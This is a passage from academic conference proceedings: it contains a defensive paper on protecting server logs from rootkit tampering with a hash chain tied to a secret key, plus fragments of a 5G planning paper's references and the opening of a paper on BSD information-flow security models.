References 1. Gartner: Gartner Identifies the Top 10 Wireless Technology Trends for 2019 and Beyond (2022). https://www.gartner.com/en/newsroom/press-releases/2019-07-23-gartneridentifies-the-top-10-wireless-technology-tre 2. Prokopenko, I., Omelchuk, I., Chyrka, Y.: RADAR signal parameters estimation in the MTD tasks. Int. J. Electron. Telecommun. 58(2), 159–164 (2012) 3. Habiba, U., Hossain, E.: Auction mechanisms for virtualization in 5G cellular networks: basics, trends, and open challenges. IEEE Commun. Surv. Tutor. 20(3), 2264–2293 (2018) 4. Cho, H.-H., Lai, C.-F., Shih, T., Chao, H.-C.: Integration of SDR and SDN for 5G. IEEE Access 2, 1196–1204 (2014) 5. Mi, D., et al.: Demonstrating immersive media delivery on 5G broadcast and multicast testing networks. IEEE Trans. Broadcast. 66(2), 555–570 (2020) 6. Tran, T., et al.: Enabling multicast and broadcast in the 5G core for converged fixed and mobile networks. IEEE Trans. Broadcast. 66(2), 428–439 (2020) 7. Haile, B., Mutafungwa, E., Hamalainen, J.: A data-driven multiobjective optimization framework for hyperdense 5G network planning. IEEE Access 8, 169423–169443 (2020) 8. González, D., Mutafungwa, E., Haile, B., Hämäläinen, J., Poveda, H.: A planning and optimization framework for ultra dense cellular deployments. Mob. Inf. Syst. 1–17 (2017) 9. Chiaraviglio, L., Di Paolo, C., Blefari Melazzi, N.: 5G network planning under service and EMF constraints: Formulation and solutions. IEEE Trans. Mob. Comput. 21, 3053–3070 (2021) 10. Tseng, F., Chou, L., Chao, H., Wang, J.: Ultra-dense small cell planning using cognitive radio network toward 5G. IEEE Wirel. Commun. 22(6), 76–83 (2015) 11. Mishra, A.: Fundamentals of Network Planning and Optimisation 2G/3G/4G. John Wiley & Sons Inc, Hoboken (2018)
Optimal Structure Construction of Private 5G Network
223
12. Umar Khan, M., Azizi, M., Garcia-Armada, A., Escudero-Garzas, J.: Unsupervised clustering for 5G network planning assisted by real data. IEEE Access. 10, 39269–39281 (2022) 13. Oughton, E., Katsaros, K., Entezami, F., Kaleshi, D., Crowcroft, J.: An open-source technoeconomic assessment framework for 5G deployment. IEEE Access 7, 155930–155940 (2019) 14. Stefanoiu, D., Borne, P., Popescu, D., Filip, F.G., El Kamel, A.: Optimization in Engineering Sciences: Approximate and Metaheuristic Methods: Metaheuristics Stochastic Methods and Decision Support. John Wiley & Sons Inc, Hoboken (2014) 15. Bezruk, V.M., Bukhanko, A.N., Chebotaryova, D., Varich, V.V.: Multicriteria optimization in telecommunication networks planning, designing and controlling. Open Book “Telecommunications Networks” 251–274 (2012) 16. Odarchenko, R., Dyka, N., Poligenko, O., Kharlai, L., Abakumova, A.: Mobile operators base station subsystem optimization method. In: 2017 IEEE 4th International Scientific-Practical Conference Problems of Infocommunications. Science and Technology (PIC S&T), pp. 29–33 (2017) 17. Sun, S., et al.: Propagation path loss models for 5G urban micro- and macro-cellular scenarios. In: 2016 IEEE 83rd Vehicular Technology Conference (VTC Spring), pp. 1–6 (2016) 18. Zhang, P., Lee, S.: Probabilistic load flow computation using the method of combined cumulants and Gram-Charlier expansion. IEEE Trans. Power Syst. 19(1), 676–682 (2004) 19. Semenov, A.: Design and Calculation of Structured Cabling Systems and Components. DMKPress, p. 418 (2018)
Linked List Systems for System Logs Protection from Cyberattacks Victor Boyko1 , Mykola Vasilenko1 , and Valeria Slatvinska2(B) 1 National University “Odessa Law Academy”, Odesa, Ukraine
[email protected] 2 International Humanitarian University, Odesa, Ukraine
[email protected]
Abstract. A new solution of an important cybersecurity problem has been proposed, namely the protection of system logs based on the use of blockchains. This approach is efficient and undemanding to computing resources when protecting system logs. System logs are one of the main components for detecting intrusion and the presence of hidden malware in the system. At the same time, in modern mid-level systems, the protection of logs from tampering is not adequately addressed. This becomes especially relevant in view of the emergence of a new generation of malware (Kobalos). We suggest using a system based on blockchains as an efficient and computationally undemanding tool for protecting system logs. Unlike traditional protection methods, the blockchain-based system that is proposed in the article does not require the deployment of additional infrastructure and can be used within the existing architecture for collecting information about the operating system. Keywords: Rootkits · malware detection · cyberattack · blockchain · log · SIEM
1 Introduction In a broad sense, the web server is the basis and key component of a modern computer network. It includes not only the software itself (the LAMP/LAPP stack), but also the entire accompanying infrastructure. It is the basis and key component of the modern World Wide Web. Various implementations of servers for home networks, servers providing a web interface for various applications have also become widespread (in particular, in Linux it is used to configure the Common UNIX Printing System). These solutions have led to the widespread use of web servers and at the same time made them the most obvious target for cyberattacks [1, 2]. Thus, the number of botnets, infected computers and attacks is growing every year. The software, techniques, tactics and strategies of the attacking side are constantly being improved. Rootkits are one of the most dangerous types of malware. This is the name of software aimed at hidden introduction into the system (in this case, a web server) and obtaining administrator rights in it (privilege escalation). A rootkit tends to remain stealth, but it usually needs to communicate with the outside world [3]. A detailed © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 224–234, 2023. https://doi.org/10.1007/978-3-031-35467-0_15
Linked List Systems for System Logs Protection from Cyberattacks
225
overview of the classification of rootkits and similar software by stealth classes and target tasks is given in [4]. Without a well-developed security infrastructure, such systems are easily contaminated with malware, and the proposed solutions of binary file analysis or system behavior require resources, knowledge, and common security culture. This, in turn, increases interest in protection by analyzing system journals. Currently experimental systems using artificial intelligence are being developed. As it was mentioned above, a new standard for system event logs has been established and is being implemented. Soon, the protection infrastructure will include automated analysis of system logs and will become widespread. At the same time, the improvement of such protection will inevitably entail the adoption of measures by the attacking side. Inevitably, malware will emerge that, after privilege escalation, will modify system logs to avoid detection. Cybercriminals have already begun to include the tools for masking the presence of malware in the system [5], inter alia by modifying logs, which complement other masking tools well (timestomping, process masking, etc.) into malware; the presence of even the most primitive attack, such as a simple deletion of logs, reduces the visibility of malware in the system, makes it difficult to detect and diagnose malware, and allows rootkits to function for a long time without being detected, which in turn increases the scale of the infection. At the same time, the work with logs and system event logs is in its initial state; as mentioned above, an attack by deleting logs is triggered only in the absence of a proper infrastructure for working with logs and event logs and low literacy of the system administrator. In the presence of the basic means of protection listed above. The deleted logs will be restored from the backup, and the very fact that there are no recordings in the system log will indicate the presence of an external intrusion and will serve as a reason to take all necessary measures to protect the system. Thus, it is necessary to pay increased attention to the preservation and analysis of system logs and organization of the minimum possible log security system. The aim of the work is to find an acceptable solution in order to optimize system logs for protecting logs in medium-level systems. This, first of all, refers to the cybersecurity of logs in the context of new generation malware. Unlike traditional protection methods, it does not require a lot of system resources and can be recommended for implementation in the most vulnerable mid-range systems. Protecting logs using blockchain complicates modification of logs “backdating”. This greatly complicates the implementation procedure (an attacker needs to select hashes, modify logs, while a rootkit usually has very limited resources), which (a) reveals the very fact of intrusion into the system, (b) leads to “distension” of the malware and the use of large resources, which again increases its “track” and facilitates detection. The novelty of the results lies in the fact that for the first time a system for checking logs using blockchain is proposed. Such system at low deployment costs allows to detect unauthorized modification to logs, which greatly facilitates the work of a system administrator and improves the security of a web server.
226
V. Boyko et al.
2 Materials and Methods To understand the problem of protecting system logs from cyberattacks, the following well-known points should be considered. There are three main tools for detecting and searching for rootkits: binary file analysis, system and user behavior analysis, and system log analysis [6, 7]. Traditional classical analysis of the system of binary files includes scanning for signatures of known malware and heuristic analysis. Both the search for signatures and the heuristic analysis in spite of all their practical value have the following disadvantages. The analysis of signatures is simple, intuitive, does not require a large amount of computing resources and allows to identify a specific attack and the malware used for it with high accuracy and a relatively low level of false positives [8]. Nonetheless collecting signatures and defining decisive rules turns out to be an extremely time-consuming task at a long distance, since modern databases contain big amount of signatures. For example, the Comodo antivirus database contains more than 86,359,675 signatures (almost one hundred million). Heuristic analysis is, in a sense, the opposite to signature analysis procedure of search. Heuristics for searching for malware can detect new and freshly written specimens, the database with rules is less cumbersome than the database with signatures, so checks can, in theory, be faster and with less resources. However, heuristic analyzers usually have a high false positive rate. Heuristic rules are easily circumvented if they are known to the malware developer in advance. It is a common practice for such developers to pre-lay special techniques and systems in attack software that allows them to avoid heuristic analysis, for example, code fragments that break or disable the debugger while trying to trace the program execution results [9]. Typically, existing antivirus software uses a combined approach that combines the first two ones. However, there are certain limits to the effectiveness of these approaches, which are determined mainly by the limitations on the power of the computing resources of the hardware. The second type of malware detecting is focused on indirect analysis of what is happening in the system. Such analysis may include analysis of network activity (content and nature of outgoing and incoming traffic), analysis of application activity, and analysis of user activity. For example, the simplest type of such analysis is an analysis of the state of the system ports, since some malware can use listening on free ports to communicate with the outside world [10, 11]. This type of analysis can be quite effective, however, the widespread use of peer-to-peer and cryptographic communication technologies complicates its work, since it becomes more and more difficult to analyze traffic that is not just encrypted, but acquires such a property as homogeneity (for example, in the case of using Tor and i2p it is difficult to separate in the traffic flow passing through the system the native traffic of the system itself from the transit data flow that passes through the system, since it gives part of its resources to the general network) [12]. Thus, the problem of protecting the system from intrusions continues to be an important and urgent problem in the sphere of cybersecurity. At the same time, currently most of the server’s security is determined by preventive measures (hardening) and competent system configuration, including installing a firewall, using strong passwords and a public key system, correct distributing of roles and rights of system users, changing default settings, etc.
Linked List Systems for System Logs Protection from Cyberattacks
227
In these conditions one of the main tools for both primary and secondary intrusion diagnostics are event logs (logs) of software and system logs (operating system logs). These are the sets of diagnostic messages that are generated by regularly or irregularly functioning software and can be effectively used to detect the fact of the invasion with taking further actions. That is why along with the analysis of files and activity we classify it in the third category of protection tools. Logs are often the only way to work on disclosing incidents; their analysis can be carried out in both manual and automated ways by selecting signatures and heuristic rules. However, they are applied not for the analysis of binary files, but for the analysis of messages in the logs [13]. Considering the cost of direct and indirect analysis of file content and system behavior, the analysis of event records in the system remains one of the last and radical means, the last resort to identify hidden malware. For a while, protection by analyzing system logs was not a priority in the development of security systems - especially among developers and middle-level administrators who do not have the resources and knowledge to organize a developed security infrastructure. The lack of common standards, tactics, and policies for the protection of system journals was an additional obstacle. This was typical for both the attacking and defending sides. Logs are valuable material for analyzing the nature of attacks, the behavior of the attacking side and informing in the case of a breach of the defense [14]. Working with logs and system logs is an important component of the system’s security, therefore, if an integrated security system is deployed, it must include SIEM (Security information and event management), which was previously a combination of SIM (Security information management) that is a system for managing information about security, and SEM (Security event management) that is a security event management system [15, 16]. SIEM provides real-time analysis of security events (triggers) emanating from various devices and applications and allows to respond to possible threats proactively. Modern delivered SIEMs can have rather complex and branched architectures and include many different sources of information. However, the use of SIEM is widespread among large corporations, but mid-level web servers are characterized, firstly, by the absence of any integrated security system, and secondly, by neglect of collecting, protecting and processing logs.
3 Experiments The whole process of the system is also divided into three parts: Provisioning Mode. At this stage, the tracking system is initialized. As mentioned above, a separately stored secret key K is used at system startup. Such a key can be a password that the user comes up with. Based on the key, hash h0 = h(K) is calculated, where h(K) is a hash function that allows to get a digest of a block of information. After the system is initialized and started initial sequence, the guard is launched, which allocates a block of information B0 , which includes the value of h0 and all entries in the system log (J1 , J2 … Jn ) that were written after the system started. After that, the guard calculates the value h1 according to the following formulas: B0 = h0 ; J1 , J2 . . . Jn ,
228
V. Boyko et al.
h1 = h(B0 ), where h0 = h(K) is a password hash of user key K; J1 , J2 … Jn are first n entries in the system log from the system start to the time the system guardian was started; B0 is initial block of data; h1 is the hash sum of the initial block of data. Value h0 is stored separately during intial start of guardian without being added to the log. The Guardian erases it safely from the system immediately after the calculation of the first hash of the first block of data. This ensures the stability of the system against a “chain attack”, which is an attack, when an attacker tries to consistently falsify all digital signatures in the log, starting with the one he needs and ending with a “zero block”. Since a zero block is not stored in the system and derived from the user’s key, the block chain is tied to the user’s key, which is inaccessible to the attacker. After erasing h0 the system is considered to be closed and goes back to normal operation. Within the terminology of the log protection system, this mode is referred to as the “control mode”. Control Mode. At this stage, the system operates in its normal mode, along with saving key information to ensure the integrity of the logs. The guardian is launched at regular intervals. In the simplest case, for a web server running GNU Linux, such a program (or a script) can start using the cron service or the corresponding systemd service. It is also possible to carry out such a start through an equal series of messages in the system log, having previously specified the number of such messages. One example of the implementation of such an algorithm is similar, although the work of the logrotate system utility is implemented for large intervals. The choice of such an interval should be based on the ratio of system resources and the size of the security window. Running the guard more frequently provides a smaller window of opportunity for attacking malware, but requires more system resources. In addition, indicators of the server software and hardware and the load of the server with requests influence the choice of the interval. Most of these parameters are empirically and quite simply selected during practice. The start of the guardian should be adjusted so that it starts after fairly short time intervals t, or after some small number of messages N . After starting, the guardian takes a block of information in the system log, similar to how it was done at the provisioning stage. Such block includes hash sum hn−1 from the previous data block Bn−1 (which is stored in the same log as the rest of the messages) and a sequence of messages J1n , J2n ...Jnn , which were generated by system services during the regular operation of the system. Let’s denote such a block as Bn : Bn = hn−1 ; J1n , J2n . . . Jnn . Guardian calculates the hash sum of the hn records according to the following formula: hn = h(Bn ), where Bn is data block n; hn is hash sum of data block n. The guardian calculates the hn value and enters it into the system log as normal system message. Thus, the selected block of messages receives a digital signature, which
Linked List Systems for System Logs Protection from Cyberattacks
229
includes the signature of the previous block. This adds a certain amount of redundant information to the system log, turning it into a sequence of connected records that are blockchain, which is closed to a key that is not in the system. The last link in the chain is outside the system in the form of a separately stored user secret password key K. Audit Mode. A reverse audit of the logs is performed with a given frequency, or upon suspicion of an intrusion. It means that system logs are checked for integrity. To do this, the log auditor is launched and sequentially checks the integrity of each block of the system log in reverse order starting with the last block and ending with the first one, which is hash value h0 = h(K), where K is separately stored user secret password. In audit mode, the following procedure is suggested. When the auditor starts, the system log has the following sequence: J1 , J2 ...Jn , h1 , ..., hn−2 , J1n−1 , J2n−1 ...Jnn−1 , hn−1 , J1n , J2n ...Jnn , hn, where J1 is the very first message in the log; Ji is log message with number i; Jn is the most recent message in the log; J1n , J2n ...Jnn are n system data block records between hn−1 and hn records; hj is hash sum of the data block Bj , including hash sum hj−1 . In most cases, the system log will have an unsigned “tail” J1t , ...Jmt , and will be like follows: J1 , J2 ...Jn , h1 , ..., hn−2 , J1n−1 , J2n−1 ...Jnn−1 , hn−1 , J1n , J2n ...Jnn , hn , J1t , ...Jmt . The “tail” represents a window of opportunity to attack the defense system, however, given the fairly short time intervals t of the guard’s launch above, such a “tail” can be neglected in practice. The auditor selects blocks of information Bn starting from the last one, which will be like follows: hn−1 , J1n , J2n . . . Jnn , hn . The auditor calculates the checksum hcn for the block Bn : Bn = hn−1 ; J1n , J2n . . . Jnn , hcn = h(Bn ), where Bn is verification data block, newly formed for audit; hcn is the hash sum of the check data block Bn . Further the control values hcn and the value hn from system log are compared. If the amounts match, the next block is checked, and the procedure is repeated for the block Bn−1 : Bn = hn−2 , J1n−1 , J2n−1 . . . Jnn−1 , hn−1 , for which the control value hcn−1 is calculated and compared with the system value hn−1 obtained from the log.
230
V. Boyko et al.
If all values from the system log match the control values, the checks are continued until block B0 appears: B0 = J1 , J2 . . . Jn , h1 . The auditor needs the h0 key, which has been removed from the system, to check the last block. Therefore, the user is asked for the password K, which was used during calculating h0 , to complete the verification procedure. Further the block Bc0 is formed: B0c = h0 , J1 , J2 . . . Jn , h1 After that, the checksum value hc1 is calculated: hc1 = h B0c , which is then compared with the system log value h1 . If the amounts match, the audit is considered to be completed, and the integrity of the system log is confirmed. If the control and system hashes do not match on any of the checks, a system integrity violation is declared and the number of the block, in which the integrity was violated, is reported. Such a system allows not only to detect the fact of modification of the logs, but also to localize its location in the general system log, and therefore significantly narrow the time interval (and in some cases, reduce the list of services that may have been compromised), which will simplify the forensic investigation of the incident.
4 Results Administrators, especially in middle-level security systems, rarely organize a backup, processing and analysis of logs. The situation is better in large corporate systems. At the same time, a backup, even if it is implemented, is rarely checked for integrity and consistency, which can be used to mask a system breach by replacing or distorting logs that can reveal it. Web servers are the most common target for cyberattacks. This stems from the fact that the personnel, who is responsible for installing and configuring web systems, is often incompetent and illiterate. The above thesis is confirmed by the following statistics. In 2015, the average time of detection of a successful cyber-attack fact ranged from 50 to 70 days [17]. According to IBM reports for 2020, it takes up to 280 days only to identify leaks, while the estimates that are made by other experts vary from hundreds of days to a year [18]. According to the Mandiant Security Effectiveness Report for 2022, 53% of successful cyber attacks have infiltrated organizations without being detected, and 91% of all incidents have not generated an alert [19]. There are several reasons for such neglect: • not everyone distinguishes logs and system logs as an important component of system security (often they limit themselves to installing a firewall and antivirus);
Linked List Systems for System Logs Protection from Cyberattacks
231
• logs take up a large volume (the log of the not the most loaded server that is analyzed in this work becomes more than 400 MB during 8 days); • working with logs requires expenditures for organizing an external infrastructure; depending on the volume of logs, such an infrastructure can be very expensive and not efficient enough; • there is no single standard or practice for working with logs. A standard for log messages (Sigma that is Generic Signature Format for SIEM Systems) [20] was proposed two years ago and has not received general acceptance yet. At the same time, the format of the logs and their processing is often left to the discretion of the server organizer and receives little attention. The maximum protection that can be carried out in this case is: • backup logs; • analysis of logs by an automatic analyzer; • analysis of logs with one’s own rules. This is clearly not enough even in large corporations that use the SIEM, especially considering the growing number of intrusions and statistics on their detection. The previous fact is aggravated by the circumstance that there are many different implementations of web server software, the configuration and security of which can be very different, which complicates training and transition from one configuration to another. The functioning of the server is provided by a set (stack) of interacting programs: a web server as such, a database, a programming language and related frameworks, configuration and interaction systems, an operating system and access protocols to it, each of components of which in a case of an illiterate configuration and operation can represent a potential or real vulnerability. The complexity and variety of web server operation systems are connected with a large amount of raw information, in which it is easy to get lost for a person who does not own the technical means of analysis and processing, inasmuch as text logs of server visits for several days can reach a size of the order of gigabytes, which makes their unarmed viewing meaningless. According to the MITRE classification [21], attacks related to modification of logs (Indicator Removal on Host: Clear Linux or Mac System Logs) belong to the metaclass with ID T1070. At the time of writing of this article, 17 types of malicious software that use the T1070.001 technique (Clear Windows Event Logs) and 3 varieties that use the T1070.002 technique (Clear Linux or Mac System Logs) have been registered. Specifically, the database describes malware S0279 Proton which removes logs from /var/logs and /Library/logs, G0106 Rocke which clears log files within the /var/log/ folder and G0139 TeamTNT that removes system logs from /var/log/syslog. The most recent discovery at the time of writing is Kobalos, which according to an ESET report [22] uses the technique of forging timestamps in system logs to hide the fact of being in the system. This is just the beginning. The emergence of malware using a similar technique of hiding presence is expected in the near future. Thus, there is already a need for a system for protecting and verifying web server logs that would meet the following criteria: would not require an expensive and complex infrastructure, would minimally increase the load on the operating system, would not
232
V. Boyko et al.
require a change in the existing architecture, would not require from the system administrator of complex implementation and deployment activities. The introduction of such a system would significantly reduce the possibility of spreading malware.
5 Discussion The system proposed in this article operates in the “parallel mode”, relying on the native system of logs. What is important, such a protection system, for all its modesty, on the one hand, does not require large implementation costs, on the other hand, it greatly complicates the attacker’s ability to hide the traces of an intrusion on the server. If an attacker wants to hide the traces of an intrusion into the system, he will either have to delete the system logs altogether, which will serve as a signal of an intrusion itself, or attack the security system. The second way, for example, may be realized by trying to find suitable collisions for the hash function, carry out a “chain attack”, or try to somehow use the unsigned “tail” of the system log. This, in the most optimistic scenario for an attacker, will greatly complicate his task and slow him down, if not make it impossible to hide traces of an intrusion. Additional complications of the algorithm are possible, however, in our opinion, the proposed process is simple and easy to implement. The controlling system turns out to be simple, undemanding to system resources. It uses a native system log as a base one and does not require the cost and resources to organize an additional system for backing up, storing and analyzing logs. The load on the server is small, even when running a conceptual prototype implemented in the Python scripting language. The resource savings can be even greater, while implementing the algorithm in C. The principal advantage of the proposed system is that it can be deployed without interfering with the internal operation of the system as a whole. It is irrelevant which mechanism for logs collecting is used. This means that the operation of the system is further unaffected by the conditions whether the logs are stored in the traditional form (as text in var/log/web server name) or the operating system uses the advanced systemd system and its associated systemd-journald. In all cases, it is sufficient for security software to have two-way access to the logs, i.e. be able to read them and leave its own messages in the log. And this is easily implemented through existing interfaces.
6 Conclusions It has been established that an acceptable solution for protecting logs is the use of linked lists based on blockchain. The scientific novelty of this study lies in the proposal of an author’s solution to a cybersecurity problem - the protection of system logs. The authors propose for the first time to implement blockchain technology to protect system logs. This decision is due to several factors: the emergence of a new generation of malware (Kobalos), the low level of protection of logs from unauthorized access in modern mid-level systems. It is proven that the use of blockchain technology even in low-level applications and relatively modest hardware systems in terms of technical characteristics will be able to ensure the integrity and security of data in distributed systems. The practical value of the proposed method of protecting system logs is that
Linked List Systems for System Logs Protection from Cyberattacks
233
the implementation of the proposed system will not require additional costs in the form of organizing an infrastructure for reserving logs on a separate server or changing existing formats for collecting information in an advanced system. In addition, such a system can be deployed on-site by an ordinary system administrator, which further simplifies and reduces the cost of its use in the field.
References 1. Holt, T.J., Leukfeldt, R., Van De Weijer, S.: An examination of motivation and routine activity theory to account for cyberattacks against Dutch web sites. Crim. Justice Behav. 47(4), 487– 505 (2020) 2. Ozer, M., Varlioglu, S., Gonen, B., Adewopo, V., Elsayed, N., Zengin S.: Cloud incident response: Challenges and opportunities. In: 2020 International Conference on Computational Science and Computational Intelligence (CSCI). IEEE, pp. 49–54 (2020) 3. Blunden, B.: The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System. Jones & Bartlett Publishers, pp. 783 (2012) 4. Harley, D., Lee, A.: The root of all evil? - rootkits revealed, pp. 1–17 (2007) 5. Chen, X., Andersen, J., Mao, Z.M., Bailey, M., Nazario, J.: Towards an understanding of anti-virtualization and anti-debugging behavior in modern malware. In: 2008 IEEE International Conference on Dependable Systems and Networks with FTCS and DCC (DSN). IEEE, pp. 177–186 (2008) 6. Aslan, Ö.A., Samet, R.A.: Comprehensive review on malware detection approaches. IEEE Access Inst. Electr. Electron. Eng. (IEEE) 8, 6249–6271 (2020) 7. Sancho, J.C., Caro, A., Ávila, M., Bravo, A.: New approach for threat classification and security risk estimations based on security event management. Futur. Gener. Comput. Syst. 113, 488–505 (2020) 8. Christodorescu, M., Jha, S.: Testing malware detectors. ACM SIGSOFT Softw. Eng. Notes 29(4), 34–44 (2004) 9. Wong, W., Stamp, M.: Hunting for metamorphic engines. J. Comput. Virol. 2(3), 211–229 (2006) 10. Jacob, G., Debar, H., Filiol, E.: Behavioral detection of malware: from a survey towards an established taxonomy. J. Comput. Virol. 4(3), 251–266 (2008) 11. Yu, B., Fang Y., Yang, Q., Tang, Y., Liu, L.: A survey of malware behavior description and analysis. Front. Inf. Technol. Electron. Eng. 19(5), 583–603 (2018) 12. Demertzis, K., Tsiknas, K., Takezis, D., Skianis, C., Iliadis, L.: Darknet traffic big-data analysis and network management to real-time automating the malicious intent detection process by a weight agnostic neural networks framework. Electronics 10(7), 781 (2021) 13. Hangxia, Z., Peng, Z., Yong, Y.: Web log system of automatic backup and remote analysis. In: 2010 International Conference on Computer Application and System Modeling (ICCASM). IEEE, pp. 469–472 (2010) 14. Barford, P., Yegneswaran, V.: An Inside Look at Botnets. Advances in Information Security, pp. 171–191. Springer, US (2007) 15. Cinque, M., Cotroneo, D., Pecchia, A.: Challenges and directions in security information and event management (SIEM). In: 2018 IEEE International Symposium on Software Reliability Engineering Workshops (ISSREW). IEEE, pp. 95–99 (2018) 16. González-Granadillo, G., González-Zarzosa, S., Diaz, R.: Security information and event management (SIEM): analysis, trends, and usage in critical infrastructures. Sensors. MDPI AG 21(14), 1–28 (2021)
234
V. Boyko et al.
17. Johnson, J.: Average number of days to resolve a cyber attack on companies in the United States as of august 2015, by attack type 2015 (2022). https://www.statista.com/statistics/193 463/average-days-to-resolve-a-cyber-attack-in-us-companies-by-attack/ 18. IBM. Cost of a Data Breach Report 2020 (2021). https://www.ibm.com/security/digital-ass ets/cost-data-breach-report/#/ru 19. Mandiant. Mandiant Security Effectiveness Report. FireEye. 1–22 (2020). https://www.fir eeye.com/current-threats/annual-threat-report/security-effectiveness-report.html 20. Bryant, B.D., Saiedian, H.: Improving SIEM alert metadata aggregation with a novel kill-chain based classification model. Comput. Secur. 94, 1–23 (2020) 21. Indicator Removal on Host: Clear Linux or Mac System Logs, Sub-technique T1070.002. Enterprise MITRE ATT&CK (2022). https://attack.mitre.org/techniques/T1070/002 22. Léveillé, M.-E., Sanmillan, I.A: WILD KOBALOS APPEARS: Tricksy linux malware goes after HP. ESET Research White Paper, pp. 1–31 (2021). https://www.welivesecurity.com/wpcontent/uploads/2021/01/ESET_Kobalos.pdf
Information Flows Formalization for BSD Family Operating Systems Security Against Unauthorized Investigation Maksym Lutskyi1 , Sergiy Gnatyuk1,2(B) , Oleksii Verkhovets2 , and Artem Polozhentsev1 1 National Aviation University, Kyiv, Ukraine
[email protected] 2 State Scientific and Research Institute of Cybersecurity Technologies and Information
Protection, Kyiv, Ukraine
Abstract. Today there is an increase in the number and complexity of cyberattacks on critical infrastructure. This has led to the actualization of security systems that are critical to national security. Software, including operating systems, is considered a resource of critical information infrastructure of the state, which is usually built on secure operating systems (UNIX, BSD family, Linux). However, any operating systems and user software have flaws and security issues at different levels. It is important to model information flows in operating systems, which will more effectively identify threats to information security, implement preventive and countermeasures. From these positions, the analysis of modern research in the direction of operating systems security and user software has been carried out, which allows to identify several basic areas, including the study of the impact of malware on operating systems and user software; vulnerability analysis; threat and risk research. The analysis shows that the issues relate to the peculiarities of construction and information processes of particular operating systems, as well as the lack of adequate mathematical models that can be applied to different security systems to obtain quantitative characteristics to compare the parameters of security systems. In addition, structural and analytical models of information flows of the BSD family of operating systems are developed, which makes it possible to formalize the information processes of the studied operating system and develop effective preventive and countermeasures. Besides, the mathematical model of quantitative evaluation of software systems for information security operating in user mode has been improved. This model will be useful both for comparison of existing software information security systems, and for the analysis of changes in security algorithms of software information security systems. Keywords: Software information security · operating system · information flow · unauthorized investigation · structural-analytical model · mathematical model · BSD
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 235–246, 2023. https://doi.org/10.1007/978-3-031-35467-0_16
236
M. Lutskyi et al.
1 Introduction Today there is an increase in the number and complexity of cyberattacks on critical infrastructure [1]. This has led to the actualization of security systems that are critical to national security. Software, including operating systems, is considered a resource of critical information infrastructure of the state, which is usually built on secure operating systems (UNIX, BSD family, Linux). However, any operating systems and user software have flaws and security issues at different levels. The information flows modeling in the OS is relevant, which will more effectively identify threats to information security, implement preventive and countermeasures. The analysis of studies on the OS and user software protection has identified several basic areas [2–5]: the study of malware impact on the OS and user software (researchers are Tinka T., Smirnov O. [5], Shadhin V. and others); vulnerability analysis (researchers are Semenov S., McGraw G. and others); threat and risk research (researchers are Kozyrakis K. [2], In-Sheng S. and others). The conducted analysis shows that there are still open issues related to the lack of adequate mathematical models that can be used for different protection systems in order to obtain quantitative characteristics to compare the parameters of protection systems [6]. The existing models of software information security systems [7–9] have been developed for some protection systems, taking into account the specifics of their design, they are not suitable to evaluate an information protection system or a specific OS [10]. It is difficult to obtain and compare quantitative characteristics due to the usage of models by a number of factors that are difficult to formalize (qualification of the researcher, availability of scanning tools for the researcher). Therefore, the purpose of this study is to formalize the information flows for more effective protection of the BSD family against unauthorized investigation.
2 Research Methodology To meet the purpose of the study, it is necessary to do the following: • To develop the classification of information flows and on its basis the structural model of the software environment to protect against means of unauthorized investigation; • To improve the mathematical model, which will allow to calculate quantitative characteristics for assessing the effectiveness of countermeasures to scanning tools, based on the created classification and structural model. 2.1 Classification of the Information Flows The BSD family consists of the following software components (Fig. 1): • • • • • •
OS kernel loader; OS kernel; File system; Main process init; Shell; System and application software;
Information Flows Formalization for BSD
237
Fig. 1. Functional structure of the BSD system
• Files. It is necessary to define the concept of information flows in the environment of the OS protection software system. An information flow is a virtual channel of exchange between the blocks of a structural model if, and only if the data exchange between these blocks occurs in at least one direction. The specific characteristic of the information flow is the fact that the usage of scanning tools can be monitored. The information protected flow must be controlled by the information protection system of the OS by means of countermeasures to scanning means [7–9]. The information flow control is an action on the part of the scanning tool, which aims to get access to the transmitted virtual data channels in order to view, modify or block it [10]. The control of the scanning tools is considered complete if such control is capable to access the original, intermediate and final transmitted data [11–13]. The following three categories of the information flows can be distinguished at the time the application is running: 1. The information flows that exist in the loaded file image. A feature of this category of information flows is that such information flow does not use any auxiliary structures for data transmission, access to which can be easily intercepted by scanning tools, which makes the processes of scanning very complicated. An example of this category is, for example, the data exchange between two data sections of the same downloaded file image. Obviously, such an exchange can be carried out without addressing the functions of the OS, which can be controlled by a potential attacker scanning tool (on the given structural models this category of information flows is indicated by solid lines);
238
M. Lutskyi et al.
2. The information flows between the executable file and the dynamically loaded libraries. The mentioned interaction is performed through the tables of the file import and/or export or by using the API functions dlopen, dlclose, dlsym. A feature of this category of information flows is the possible scanning by software code investigation tools. This investigation can be performed by modifying the import and/or export tables of the target library, which is dynamically loaded, or by deploying a library that is a software bookmark (on the given structural models this category of information flows is indicated by dashed lines); 3. The information flow of interaction between the user mode and the kernel mode. Such flow can be present either in the image of the executable file or in the image of dynamically loaded libraries. A feature of this category of information flows is the possible full scanning by an attacker and complicated control by the software protection system of the integrity of the transmitted information. Such complications occur due to the lack of direct access to the kernel mode from the user mode information protection software system, which makes it difficult to detect potential attacker scanning tools located in the kernel mode (on the given structural models this category of information flows is indicated by dashed lines). The classification of the information flows into the mentioned categories is given due to the following reasons: • it takes into account the places of deployment of software code investigation tools; • it takes into account the complexity of scanning of each category from the side of software code investigation methods. By improving the mathematical model for assessing the reliability of a software information protection system, which is based on Markov processes, the complexity of the investigation process can be shown by using the intensity of events [12–14]. The mentioned categories of information flows are available in any address space of the user’s application, which allows to apply the developed classification to any information protection system. The developed classification of information flows is used to build the structural models of the software environment in the aspect of protection against scanning tools. 2.2 Structural and Analytical Models The following designations are used in the structural model: • user mode is marked as “Ring 3”; • kernel mode is marked as “Ring 0”. The structural model of the information flows of the user’s application software environment is shown in Fig. 2. The developed structural model takes into account the following characteristics of the user’s applications: 1. The absence of direct access to the address space of the “Ring 0” of protection from the side of the user’s application code;
Information Flows Formalization for BSD
239
Fig. 2. Structural model of information flows of user application software environment
